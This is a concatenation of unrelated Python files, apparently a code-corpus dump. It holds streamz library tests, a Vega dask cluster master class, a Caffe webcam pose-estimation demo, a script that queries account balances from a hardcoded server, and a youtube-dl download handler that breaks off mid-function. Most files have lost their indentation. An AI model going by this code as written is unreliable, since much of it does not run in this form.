sin.frequencies,
sin.flatten,
sin.unique,
sin.union,
partial(sin.pluck, 0),
sin.collect,
]
good_kwargs = dict(stream_name=test_name)
bad_kwargs = dict(foo="bar")
for s in streams:
# try good kwargs
sout = s(**good_kwargs)
assert sout.name == test_name
del sout
with pytest.raises(TypeError):
sout = s(**bad_kwargs)
sin.emit(1)
# need a second emit for accumulate
sin.emit(1)
del sout
# verify that sout is properly deleted each time by emitting once into sin
# and not getting TypeError
# garbage collect and then try
import gc
gc.collect()
sin.emit(1)
@pytest.fixture
def thread(loop): # noqa: F811
from threading import Thread, Event
thread = Thread(target=loop.start)
thread.daemon = True
thread.start()
event = Event()
loop.add_callback(event.set)
event.wait()
return thread
def test_percolate_loop_information(clean): # noqa: F811
source = Stream()
assert not source.loop
s = source.timed_window(0.5)
assert source.loop is s.loop
def test_separate_thread_without_time(loop, thread): # noqa: F811
assert thread.is_alive()
source = Stream(loop=loop)
L = source.map(inc).sink_to_list()
for i in range(10):
source.emit(i)
assert L[-1] == i + 1
def test_separate_thread_with_time(clean): # noqa: F811
L = []
@gen.coroutine
def slow_write(x):
yield gen.sleep(0.1)
L.append(x)
source = Stream(asynchronous=False)
source.map(inc).sink(slow_write)
start = time()
source.emit(1)
stop = time()
assert stop - start > 0.1
assert L == [2]
def test_execution_order():
L = []
for i in range(5):
s = Stream()
b = s.pluck(1)
a = s.pluck(0)
li = a.combine_latest(b, emit_on=a).sink_to_list()
z = [(1, 'red'), (2, 'blue'), (3, 'green')]
for zz in z:
s.emit(zz)
L.append((li, ))
for ll in L:
assert ll == L[0]
L2 = []
for i in range(5):
s = Stream()
a = s.pluck(0)
b = s.pluck(1)
li = a.combine_latest(b, emit_on=a).sink_to_list()
z = [(1, 'red'), (2, 'blue'), (3, 'green')]
for zz in z:
s.emit(zz)
L2.append((li,))
for ll, ll2 in zip(L, L2):
assert ll2 == L2[0]
assert ll != ll2
@gen_test()
def test_map_errors_log():
a = Stream(asynchronous=True)
b = a.delay(0.001).map(lambda x: 1 / x) # noqa: F841
with captured_logger('streamz') as logger:
a._emit(0)
yield gen.sleep(0.1)
out = logger.getvalue()
assert 'ZeroDivisionError' in out
def test_map_errors_raises():
a = Stream()
b = a.map(lambda x: 1 / x) # noqa: F841
with pytest.raises(ZeroDivisionError):
a.emit(0)
@gen_test()
def test_accumulate_errors_log():
a = Stream(asynchronous=True)
b = a.delay(0.001).accumulate(lambda x, y: x / y, with_state=True) # noqa: F841
with captured_logger('streamz') as logger:
a._emit(1)
a._emit(0)
yield gen.sleep(0.1)
out = logger.getvalue()
assert 'ZeroDivisionError' in out
def test_accumulate_errors_raises():
a = Stream()
b = a.accumulate(lambda x, y: x / y, with_state=True) # noqa: F841
with pytest.raises(ZeroDivisionError):
a.emit(1)
a.emit(0)
@gen_test()
def test_sync_in_event_loop():
a = Stream()
assert not a.asynchronous
L = a.timed_window(0.01).sink_to_list()
sleep(0.05)
assert L
assert a.loop
assert a.loop is not IOLoop.current()
def test_share_common_ioloop(clean): # noqa: F811
a = Stream()
b = Stream()
aa = a.timed_window(0.01)
bb = b.timed_window(0.01)
assert aa.loop is bb.loop
@pytest.mark.parametrize('data', [
[[], [0, 1, 2, 3, 4, 5]],
[[None, None, None], [0, 1, 2, 3, 4, 5]],
[[1, None, None], [1, 2, 3, 4, 5]],
[[None, 4, None], [0, 1, 2, 3]],
[[None, 4, 2], [0, 2]],
[[3, 1, None], []]
])
def test_slice(data):
pars, expected = data
a = Stream()
b = a.slice(*pars)
out = b.sink_to_list()
for i in range(6):
a.emit(i)
assert out == expected
def test_slice_err():
a = Stream()
with pytest.raises(ValueError):
a.slice(end=-1)
def test_start():
flag = []
class MySource(Stream):
def start(self):
flag.append(True)
s = MySource().map(inc)
s.start()
assert flag == [True]
def test_connect_zip():
a = Stream()
b = Stream()
c = Stream()
x = a.zip(b)
L = x.sink_to_list()
c.connect(x)
a.emit(1)
b.emit(1)
assert not L
c.emit(1)
assert L == [(1, 1, 1)]
def test_disconnect_zip():
a = Stream()
b = Stream()
c = Stream()
x = a.zip(b, c)
L = x.sink_to_list()
b.disconnect(x)
a.emit(1)
b.emit(1)
assert not L
c.emit(1)
assert L == [(1, 1)]
def test_connect_combine_latest():
a = Stream()
b = Stream()
c = Stream()
x = a.combine_latest(b, emit_on=a)
L = x.sink_to_list()
c.connect(x)
b.emit(1)
c.emit(1)
a.emit(1)
assert L == [(1, 1, 1)]
def test_connect_discombine_latest():
a = Stream()
b = Stream()
c = Stream()
x = a.combine_latest(b, c, emit_on=a)
L = x.sink_to_list()
c.disconnect(x)
b.emit(1)
c.emit(1)
a.emit(1)
assert L == [(1, 1)]
if sys.version_info >= (3, 5):
from streamz.tests.py3_test_core import * # noqa
def test_buffer_after_partition():
Stream().partition(1).buffer(1)
def test_buffer_after_timed_window():
Stream().timed_window(1).buffer(1)
def test_buffer_after_sliding_window():
Stream().sliding_window(1).buffer(1)
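# Illustrative sketch, added here rather than part of the original suite: a
# minimal end-to-end pipeline using only APIs already exercised above
# (Stream, filter, map, sink_to_list, emit), as a compact reference example.
def test_example_pipeline_sketch():
    source = Stream()
    L = source.filter(lambda x: x % 2 == 0).map(lambda x: x * 10).sink_to_list()
    for i in range(5):
        source.emit(i)
    assert L == [0, 20, 40]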
|
master.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""The main part of the cluster framework.
The Master Class to create, maintain distribute framework and distribute
calculate tasks.
"""
import os
import sys
import logging
import time
import threading
import uuid
import glob
from threading import Lock
from queue import Queue
from vega.trainer import utils
from .distribution import ClusterDaskDistributor
from vega.common import TaskOps, FileOps
from vega.common.general import General
from .worker_env import WorkerEnv
from .dask_env import DaskEnv
from vega.trainer.deserialize import pickle_worker
from vega.trainer.run_remote_worker import run_remote_worker
from .master_base import MasterBase
from vega.report import ReportClient
class Master(MasterBase):
"""The Master Class is to create, maintain distribute framework and distribute calculate tasks.
:param argparse.ArgumentParser args: `args` is a argparse that should
contain `init_method`, `rank` and `world_size`.
:param Config cfg: `cfg`.
"""
def __init__(self, update_func=None):
"""Init master attrs, setup and start dask distributed cluster and local multiprocess pool."""
self._checkout_cluster_existed()
self.cfg = General()
self.task_count = 0
self.eval_count = General.worker.eval_count
self.__master_path__ = FileOps.join_path(TaskOps().temp_path, "master")
FileOps.make_dir(self.__master_path__)
self.dask_env = DaskEnv(General.env,
self.__master_path__,
General.devices_per_trainer,
TaskOps().temp_path)
status = self.dask_env.start()
if not status or not self.dask_env.is_master:
sys.exit(0)
self._start_cluster()
self.t_queue = Queue()
self.update_func = update_func
self._thread_runing = True
self._lock = Lock()
self._thread = self._run_monitor_thread()
return
def restart(self, update_func=None):
"""Renew master."""
self.client = self.get_client()
self.update_func = update_func
if not self._thread_runing:
self._thread = self._run_monitor_thread()
def get_client(self):
"""Get Master client."""
if not hasattr(self, "client"):
self.client = self.md.get_client()
return self.client
def _checkout_cluster_existed(self):
# TODO
return False
def _start_cluster(self):
"""Set and start dask distributed cluster."""
self.md = ClusterDaskDistributor(self.dask_env.master_address)
self.client = self.md.get_client()
local_host = None
if "BATCH_CURRENT_HOST" in os.environ:
local_host = os.environ["BATCH_CURRENT_HOST"]
elif "BATCH_CUSTOM0_HOSTS" in os.environ:
local_host = os.environ["BATCH_CUSTOM0_HOSTS"]
if "CUDA_VISIBLE_DEVICES" in os.environ:
os.environ["ORIGIN_CUDA_VISIBLE_DEVICES"] = os.environ["CUDA_VISIBLE_DEVICES"]
self._remove_worker_number_file()
plugin = WorkerEnv(self.dask_env.slave_proc_num,
self.dask_env.slave_device_num_per_proc,
local_host,
os.getpid(),
TaskOps().temp_path)
self.client.register_worker_plugin(plugin)
if "ORIGIN_CUDA_VISIBLE_DEVICES" in os.environ:
os.environ["CUDA_VISIBLE_DEVICES"] = os.environ["ORIGIN_CUDA_VISIBLE_DEVICES"]
if "CUDA_VISIBLE_DEVICES" in os.environ and "ORIGIN_CUDA_VISIBLE_DEVICES" not in os.environ:
del os.environ["CUDA_VISIBLE_DEVICES"]
return
def _remove_worker_number_file(self):
_worker_number_file = os.path.join(TaskOps().temp_path, ".*worker_number")
files = glob.glob(_worker_number_file)
for _file in files:
os.remove(_file)
@property
def has_free_worker(self):
"""Property: check is has free dask worker.
:return: return Ture if has free dask worker, otherwise return False.
:rtype: bool
"""
if self.md.process_queue_full():
return False
else:
return True
def run(self, worker, evaluator=None):
"""Run a distributed_worker on different cluster.
:param worker: A serializable object (callable and has `__call__`
function) which need to be distributed calculaton.
:type worker: object that the class was inherited from DistributedWorker.
"""
if worker is None:
return
workers = [worker]
if evaluator and evaluator.worker_type == utils.WorkerTypes.EVALUATOR:
for sub_worker in evaluator.sub_worker_list:
if sub_worker.worker_type == utils.WorkerTypes.DeviceEvaluator:
workers.insert(0, sub_worker)
else:
workers.append(sub_worker)
finished = False
while not finished:
if not self.md.process_queue_full():
p_id = self.task_count
if worker.step_name is not None and worker.worker_id is not None:
p_id = "{0}::{1}::{2}".format(
worker.worker_type.name, worker.step_name, worker.worker_id)
pickle_id = uuid.uuid1().hex[:8]
pickle_worker(workers, pickle_id)
self.md.distribute(
client=self.client,
pid=p_id,
func=run_remote_worker,
kwargs={
"worker_id": worker.worker_id,
"worker_path": worker.get_local_worker_path(),
"id": pickle_id,
"num_workers": len(workers)})
self.task_count = self.task_count + 1
return p_id
else:
time.sleep(0.1)
return
@staticmethod
def _monitor_thread(master):
while master and master._thread_runing:
worker_info_list = master._pop_all_finished_worker()
if worker_info_list:
for worker_info in worker_info_list:
worker_id = worker_info["worker_id"]
master._update(worker_info["step_name"], worker_id)
time.sleep(0.1)
def _update(self, step_name, worker_id):
        # Wait for the report thread to update all records
ReportClient().set_finished(step_name, worker_id)
if not self.update_func:
return
if self.update_func.__code__.co_varnames.index("step_name") == 1:
self.update_func(step_name, worker_id)
else:
self.update_func({"step_name": step_name, "worker_id": worker_id})
def _run_monitor_thread(self):
try:
logging.debug("Start master monitor thread.")
self._thread_runing = True
monitor_thread = threading.Thread(target=Master._monitor_thread, args=(self,))
monitor_thread.daemon = True
monitor_thread.start()
return monitor_thread
except Exception as e:
logging.error("Failed to run monitor thread.")
raise e
def join(self):
"""Wait all workers to finished."""
self.md.join()
return
def update_status(self):
"""Update Master queue status."""
t_pid, _ = self.md.result_queue_get()
if t_pid is not None:
pid_splited = t_pid.split("::")
if len(pid_splited) >= 3:
(_type, step_name, worker_id) = pid_splited
pid = "{0}::{1}".format(step_name, worker_id)
self.t_queue.put(pid)
return
def get_result_from_worker(self):
"""Get a result from a finished worker in dask cluster.
:return: the pid and result of a finished worker if there are finished
worker in queue, otherwise return(None, None).
:rtype: (pid, result) or (None, None)
"""
if not self.md.result_queue_empty():
pid, result = self.md.result_queue_get()
return pid, result
else:
return None, None
def _pop_finished_worker(self):
"""Pop a finished dask worker's info, if there are finished dask worker in queue.
:return: the finished worker info, include step_name and worker_id.
eg. {"step_name":"round1", "worker_id":1}
:rtype: dict or None
"""
self.update_status()
pid = None
if not self.t_queue.empty():
pid = self.t_queue.get()
if pid is None:
return None
else:
pid_splited = pid.split("::")
if len(pid_splited) < 2:
return None
else:
return {"step_name": pid_splited[0],
"worker_id": pid_splited[1]}
def _pop_all_finished_worker(self):
"""Pop all finished train worker's info.
:return: a finished worker info list.
:rtype: list of dict
"""
worker_info_list = []
finished_train_worker_info = self._pop_finished_worker()
while finished_train_worker_info is not None:
worker_info_list.append(finished_train_worker_info)
finished_train_worker_info = self._pop_finished_worker()
return worker_info_list
def close(self):
"""Close cluster client."""
self._thread_runing = False
if self._thread:
self._thread.join()
        # Wait for the thread to exit.
        if hasattr(self, "client") and self.client:
            self.client.close()
            del self.client
        # Wait for the cluster to close.
time.sleep(1)
def shutdown(self):
"""Close cluster client."""
self.close()
client = self.get_client()
client.shutdown()
client.close()
del client
        # Wait for the cluster to close.
time.sleep(1)
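# Illustrative sketch (added; not part of the original module): mirrors the
# "worker_type::step_name::worker_id" pid convention that run() builds and that
# update_status()/_pop_finished_worker() parse, without requiring a dask
# cluster. The literal "TRAINER" below is just a placeholder worker type.
def _example_pid_convention_sketch():
    p_id = "{0}::{1}::{2}".format("TRAINER", "round1", 7)
    pid_parts = p_id.split("::")
    if len(pid_parts) >= 3:
        (_type, step_name, worker_id) = pid_parts
        short_pid = "{0}::{1}".format(step_name, worker_id)
        return {"step_name": short_pid.split("::")[0],
                "worker_id": short_pid.split("::")[1]}
    return None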
|
demo_multithread.py
|
import caffe
import argparse
import os
import cv2
import numpy as np
import time
import matplotlib.pyplot as plt
import threading
import Queue
from mpl_toolkits.mplot3d import Axes3D
import utils
parser = argparse.ArgumentParser()
parser.add_argument('--device', default='gpu')
parser.add_argument('--model_dir', default='/media/tim_ho/HDD1/Projects/VNect-tensorflow/models')
parser.add_argument('--input_size', default=368)
parser.add_argument('--num_of_joints', default=21)
parser.add_argument('--pool_scale', default=8)
parser.add_argument('--plot_2d', default=False)
parser.add_argument('--plot_3d', default=True)
args = parser.parse_args()
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# Limb parents of each joint
limb_parents = [1, 15, 1, 2, 3, 1, 5, 6, 14, 8, 9, 14, 11, 12, 14, 14, 1, 4, 7, 10, 13]
# Input scales
scales = [1.0, 0.7]
# Global vars for threads
# joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
# joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
# cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
# hm_size = args.input_size // args.pool_scale
# hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# Create queue between threads
cam_model_q = Queue.Queue(1)
model_post_q = Queue.Queue(1)
post_render_q = Queue.Queue(1)
def camera_reader():
cam = cv2.VideoCapture(0)
while True:
t1 = time.time()
cam_img = utils.read_square_image('', cam, args.input_size, 'WEBCAM')
if not cam_model_q.full():
cam_model_q.put(cam_img)
# print('cam put')
print('Cam FPS', 1/(time.time()-t1))
def forward():
# global hm_avg, x_hm_avg, y_hm_avg, z_hm_avg
cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
if args.device == 'cpu':
caffe.set_mode_cpu()
elif args.device == 'gpu':
caffe.set_mode_gpu()
caffe.set_device(1)
else:
raise ValueError('No such device')
model_prototxt_path = os.path.join(args.model_dir, 'vnect_net.prototxt')
model_weight_path = os.path.join(args.model_dir, 'vnect_model.caffemodel')
# Load model
model = caffe.Net(model_prototxt_path,
model_weight_path,
caffe.TEST)
# Show network structure and shape
print('##################################################')
print('################Network Structures################')
print('##################################################')
for layer_name in model.params.keys():
print(layer_name, model.params[layer_name][0].data.shape)
print('')
print('##################################################')
print('##################################################')
print('##################################################')
print('\n\n\n\n')
print('##################################################')
print('################Input Output Blobs################')
print('##################################################')
for i in model.blobs.keys():
print(i, model.blobs[i].data.shape)
print('##################################################')
print('##################################################')
print('##################################################')
# cam = cv2.VideoCapture(0)
is_tracking = False
# for img_name in os.listdir('test_imgs'):
while True:
# if not is_tracking:
img_path = 'test_imgs/{}'.format('dance.jpg')
t1 = time.time()
input_batch = []
if not cam_model_q.empty():
cam_img = cam_model_q.get()
# print('forward get')
# cam_img = utils.read_square_image('', cam, args.input_size, 'WEBCAM')
# cam_img = utils.read_square_image(img_path, '', args.input_size, 'IMAGE')
# cv2.imshow('', cam_img)
# cv2.waitKey(0)
orig_size_input = cam_img.astype(np.float32)
for scale in scales:
resized_img = utils.resize_pad_img(orig_size_input, scale, args.input_size)
input_batch.append(resized_img)
input_batch = np.asarray(input_batch, dtype=np.float32)
input_batch = np.transpose(input_batch, (0, 3, 1, 2))
input_batch /= 255.0
input_batch -= 0.4
model.blobs['data'].data[...] = input_batch
# Forward
model.forward()
# Get output data
x_hm = model.blobs['x_heatmap'].data
y_hm = model.blobs['y_heatmap'].data
z_hm = model.blobs['z_heatmap'].data
hm = model.blobs['heatmap'].data
# Trans coordinates
x_hm = x_hm.transpose([0, 2, 3, 1])
y_hm = y_hm.transpose([0, 2, 3, 1])
z_hm = z_hm.transpose([0, 2, 3, 1])
hm = hm.transpose([0, 2, 3, 1])
# Average scale outputs
hm_size = args.input_size // args.pool_scale
hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
for i in range(len(scales)):
rescale = 1.0 / scales[i]
scaled_hm = cv2.resize(hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_x_hm = cv2.resize(x_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_y_hm = cv2.resize(y_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_z_hm = cv2.resize(z_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
mid = [scaled_hm.shape[0] // 2, scaled_hm.shape[1] // 2]
hm_avg += scaled_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
x_hm_avg += scaled_x_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
y_hm_avg += scaled_y_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
z_hm_avg += scaled_z_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
hm_avg /= len(scales)
x_hm_avg /= len(scales)
y_hm_avg /= len(scales)
z_hm_avg /= len(scales)
t2 = time.time()
# Get 2d joints
joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
joints_3d)
print('Post FPS', 1/(time.time()-t2))
if not model_post_q.full():
# model_post_q.put([hm_avg, x_hm_avg, y_hm_avg, z_hm_avg, cam_img])
model_post_q.put([joints_2d, joints_3d, cam_img])
# print('forward put')
print('Forward FPS', 1 / (time.time() - t1))
# Get 2d joints
# joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
# joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
# joints_3d)
# plt.show(block=False)
def post_process():
# global joints_2d, joints_3d
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
hm_size = args.input_size // args.pool_scale
hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
while True:
if not model_post_q.empty():
[hm_avg, x_hm_avg, y_hm_avg, z_hm_avg, cam_img] = model_post_q.get(False)
# print('post get')
t1 = time.time()
# Get 2d joints
joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
if args.plot_3d:
joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
joints_3d)
print('Post FPS', 1/(time.time()-t1))
if not post_render_q.full():
post_render_q.put([joints_2d, joints_3d, cam_img])
# print('post put')
def render_plt():
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
if args.plot_3d and args.plot_2d:
plt.ion()
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
plt.show()
elif args.plot_3d:
plt.ion()
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
while True:
if model_post_q.qsize() != 0:
[joints_2d, joints_3d, cam_img] = model_post_q.get(False)
else:
print('render old')
t1 = time.time()
# Plot 2d location heatmap
if args.plot_2d:
joint_map = np.zeros(shape=(args.input_size, args.input_size, 3))
for joint_num in range(joints_2d.shape[0]):
cv2.circle(joint_map, center=(joints_2d[joint_num][1], joints_2d[joint_num][0]), radius=3,
color=(255, 0, 0), thickness=-1)
# Plot 2d limbs
limb_img = utils.draw_limbs_2d(cam_img, joints_2d, limb_parents)
# Plot 3d limbs
if args.plot_3d:
ax.clear()
ax.view_init(azim=0, elev=90)
ax.set_xlim(-700, 700)
ax.set_ylim(-800, 800)
ax.set_zlim(-700, 700)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
utils.draw_limbs_3d(joints_3d, limb_parents, ax)
# draw heatmap
# hm_img = utils.draw_predicted_heatmap(hm_avg*200, args.input_size)
# cv2.imshow('hm', hm_img.astype(np.uint8))
# cv2.waitKey(0)
if args.plot_2d and args.plot_3d:
concat_img = np.concatenate((limb_img, joint_map), axis=1)
ax2.imshow(concat_img[..., ::-1].astype(np.uint8))
plt.pause(1e-10)
elif args.plot_3d:
plt.pause(1e-10)
else:
concat_img = np.concatenate((limb_img, joint_map), axis=1)
cv2.imshow('2d', concat_img.astype(np.uint8))
cv2.waitKey(1)
# ax2.imshow(concat_img.astype(np.uint8))
print('Render FPS', 1 / (time.time() - t1))
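# Illustrative sketch (added; not part of the original demo): the same bounded
# Queue handoff used between camera_reader/forward/render_plt, exercised with
# dummy payloads so the producer/consumer flow can be checked without a camera,
# a Caffe model or a GPU.
def example_queue_handoff_sketch():
    q = Queue.Queue(1)
    consumed = []
    def producer():
        for item in [0, 1, 2]:
            q.put(item)  # blocks until the consumer has drained the single slot
    def consumer():
        for _ in [0, 1, 2]:
            consumed.append(q.get())
    workers = [threading.Thread(target=producer), threading.Thread(target=consumer)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return consumed  # expected: [0, 1, 2]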
if __name__ == '__main__':
t1 = threading.Thread(target=camera_reader, name='cam_thread')
t2 = threading.Thread(target=forward, name='model_thread')
# t3 = threading.Thread(target=post_process, name='post_process_thread')
t4 = threading.Thread(target=render_plt, name='render_thread')
t1.start()
t2.start()
# t3.start()
t4.start()
|
test_inquire_balances_parralelly.py
|
# passed
from wrapper.client import Client
from wrapper import db as DB
import os
import requests
import threading
import json
result = []
def store_response(address):
content = requests.get('http://47.52.0.154:8888/accounts/' + address)
    content = content.content
    try:
        content = json.loads(content)
        balance = float(content['balances'][0]['balance'])
        result.append((address, balance))
except Exception as e:
print(e)
store_response('GAA6EXQ7OZPJI4KWH3DNDNVEDAJ6QXF2DEDIKU7CGROWKHWDFQJAT5SQ')
path = os.getcwd()
DB_NAME = path + '\\keys.db'
my_sql_manager = DB.SQLManager(DB_NAME)
rows = my_sql_manager.execute('select * from keys order by ID asc limit 1024')
addresses = []
threads = []
for i in range(512):
address = rows[i][2]
thread = threading.Thread(target=store_response, args=(address,))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
a = 1
|
ydlhandler.py
|
import os
from queue import Queue
from threading import Thread
import subprocess
import io
import importlib
import json
from time import sleep
from datetime import datetime
import sys
from subprocess import Popen, PIPE, STDOUT
from ydl_server.logdb import JobsDB, Job, Actions, JobType
def reload_youtube_dl():
for module in list(sys.modules.keys()):
if 'youtube' in module:
try:
importlib.reload(sys.modules[module])
except ModuleNotFoundError:
print("ModuleNotFoundError:\n" + module)
def get_ydl_website(ydl_module_name):
import pip._internal.commands.show as pipshow
info = list(pipshow.search_packages_info([ydl_module_name]))
if len(info) < 1 or 'home-page' not in info[0]:
return ''
return info[0]['home-page']
def read_proc_stdout(proc, strio):
strio.write(proc.stdout.read1().decode())
class YdlHandler:
def __init__(self, app_config, jobshandler):
self.queue = Queue()
self.thread = None
self.done = False
self.ydl_module = None
self.ydl_module_name = None
self.app_config = app_config
self.jobshandler = jobshandler
self.app_config['ydl_last_update'] = datetime.now()
modules = ['youtube-dl', 'youtube-dlc']
if os.environ.get('YOUTUBE_DL') in modules:
self.ydl_module = importlib.import_module(
os.environ.get('YOUTUBE_DL').replace('-', '_'))
else:
for module in modules:
try:
self.ydl_module = importlib.import_module(
module.replace('-', '_'))
break
except ImportError:
pass
if self.ydl_module is None:
raise ImportError('No youtube_dl implementation found')
self.ydl_module_name = self.ydl_module.__name__.replace('_', '-')
self.ydl_website = get_ydl_website(self.ydl_module_name)
print('Using {} module'.format(self.ydl_module_name))
def start(self):
self.thread = Thread(target=self.worker)
self.thread.start()
def put(self, obj):
self.queue.put(obj)
def finish(self):
self.done = True
def worker(self):
while not self.done:
job = self.queue.get()
job.status = Job.RUNNING
self.jobshandler.put((Actions.SET_STATUS, (job.id, job.status)))
if job.type == JobType.YDL_DOWNLOAD:
output = io.StringIO()
try:
self.download(job, {'format': job.format}, output)
except Exception as e:
job.status = Job.FAILED
job.log = "Error during download task:\n{}:\n\t{}"\
.format(type(e).__name__, str(e))
print("Error during download task:\n{}:\n\t{}"\
.format(type(e).__name__, str(e)))
elif job.type == JobType.YDL_UPDATE:
rc, log = self.update()
job.log = Job.clean_logs(log)
job.status = Job.COMPLETED if rc == 0 else Job.FAILED
self.jobshandler.put((Actions.UPDATE, job))
self.queue.task_done()
def update(self):
if os.environ.get('YDL_PYTHONPATH'):
command = [
"pip", "install", "--no-cache-dir",
"-t", os.environ.get('YDL_PYTHONPATH'),
"--upgrade", self.ydl_module_name
]
else:
command = [
"pip", "install", "--no-cache-dir",
"--upgrade", self.ydl_module_name
]
proc = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, err = proc.communicate()
if proc.wait() == 0:
self.app_config['ydl_last_update'] = datetime.now()
reload_youtube_dl()
return proc.returncode, str(out.decode('utf-8'))
def get_ydl_options(self, ydl_config, request_options):
ydl_config = ydl_config.copy()
req_format = request_options.get('format')
if req_format is None:
req_format = 'best'
if req_format.startswith('audio/'):
ydl_config.update({'extract-audio': None})
ydl_config.update({'audio-format': req_format.split('/')[-1]})
elif req_format.startswith('video/'):
# youtube-dl downloads BEST video and audio by default
if req_format != 'video/best':
ydl_config.update({'format': req_format.split('/')[-1]})
else:
ydl_config.update({'format': req_format})
return ydl_config
def download_log_update(self, job, proc, strio):
while job.status == Job.RUNNING:
read_proc_stdout(proc, strio)
job.log = Job.clean_logs(strio.getvalue())
self.jobshandler.put((Actions.SET_LOG, (job.id, job.log)))
sleep(3)
def fetch_metadata(self, url):
ydl_opts = self.app_config.get('ydl_options', {})
cmd = self.get_ydl_full_cmd(ydl_opts, url)
cmd.extend(['-J', '--flat-playlist'])
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
if proc.wait() != 0:
return -1, stderr.decode()
return 0, json.loads(stdout)
def get_ydl_full_cmd(self, opt_dict, url):
cmd = [self.ydl_module_name]
if opt_dict is not None:
for key, val in opt_dict.items():
if isinstance(val, bool) and not val:
continue
cmd.append('--{}'.format(key))
if val is not None and not isinstance(val, bool):
cmd.append(str(val))
cmd.append(url)
return cmd
def download(self, job, request_options, output):
ydl_opts = self.get_ydl_options(self.app_config.get('ydl_options', {}),
request_options)
cmd = self.get_ydl_full_cmd(ydl_opts, job.url)
rc, metadata = self.fetch_metadata(job.url)
if rc != 0:
job.log = Job.clean_logs(metadata)
job.status = Job.FAILED
raise Exception(job.log)
self.jobshandler.put((Actions.SET_NAME,
(job.id, metadata.get('title', job.url))))
if metadata.get('_type') == 'playlist':
ydl_opts.update({
'output': self.app_config['ydl_server']
.get('output_playlist', ydl_opts.get('output'))
})
cmd = self.get_ydl_full_cmd(ydl_opts, job.url)
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT)
stdout_thread = Thread(target=self.download_log_update,
args=(job, proc, output))
stdout_thread.start()
if proc.wait() == 0:
read_proc_stdout(proc, output)
job.log = Job.clean_logs(output.getvalue())
job.status = Job.COMPLETED
else:
read_proc_stdout(proc, output)
job.log = Job.clean_logs(output.getvalue())
job.status = Job.FAILED
print("Error during download task:\n" + output.getvalue())
stdout_thread.join()
def resume_pending(self):
db = JobsDB(readonly=False)
jobs = db.get_all()
not_endeds = [job for job in jobs if job['status'] == "Pending"
or job['status'] == 'Running']
for pending in not_endeds:
if int(pending["type"]) == JobType.YDL_UPDATE:
self.jobshandler.put((Actions.SET_STATUS,
(pending["id"], Job.FAILED)))
else:
job = Job(pending["name"],
Job.PENDING, "Queue stopped",
